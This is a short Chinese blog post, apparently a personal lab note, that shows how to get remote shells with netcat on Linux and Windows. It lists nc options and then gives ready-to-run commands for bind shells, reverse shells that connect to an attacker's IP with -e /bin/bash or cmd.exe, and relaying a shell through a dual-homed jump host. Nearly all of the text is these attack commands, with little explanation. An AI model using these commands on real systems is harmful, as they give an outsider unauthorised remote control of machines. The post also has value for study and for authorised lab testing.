天天看点

NC反弹shell

作者:网络安全菜鸟

NC常见参数:

-c 指定连接后要执行的shell命令

-e 指定连接后要执行的文件名

-l 监听模式

-p 设置本地使用的通信端口

-u 使用UDP传输协议,默认是TCP

-v 显示命令执行过程,使用-vv显示更详细信息

NC——正向Shell

Linux

靶机:

nc -lvp 8888 -e /bin/bash
NC反弹shell

靶机

攻击机:

nc 靶机ip 8888

攻击机连接靶机ip 端口

NC反弹shell

攻击机

Windows

靶机:

nc.exe -lvp 8888 -e cmd.exe

攻击机:

nc 靶机ip 8888

NC——反向Shell

Linux

攻击机:攻击机开启监听

nc -lvp 8888
NC反弹shell

攻击机开启监听

靶机:

nc 攻击机ip 8888 -e /bin/bash
NC反弹shell

靶机

NC反弹shell

攻击机

Windows

攻击机:

nc -lvp 80

靶机:

nc 攻击机ip 80 -e cmd.exe

NC——通过跳板机反弹Shell

Linux

靶机:(server2008)

nc.exe -lvp 6666 -e cmd.exe

攻击机:(kali02)

nc -lvp 8888

边界机:(kali 双网卡)

nc -nv 攻击机ip 8888 -c "nc 靶机ip 6666"

Windows

靶机:(server2008)

nc.exe -lvp 6666 -e cmd.exe
NC反弹shell

靶机

攻击机:(win702)

nc.exe -lvp 8888
NC反弹shell

攻击机

边界机:(win701 双网卡)

nc.exe -nv 攻击机ip 8888 -e "nc.exe 靶机ip 6666"
NC反弹shell

边界机

然后在攻击机中执行相关命令

NC反弹shell

攻击机

禁止转载,如需转载请通过简信或评论联系作者。

1人点赞

建立通信隧道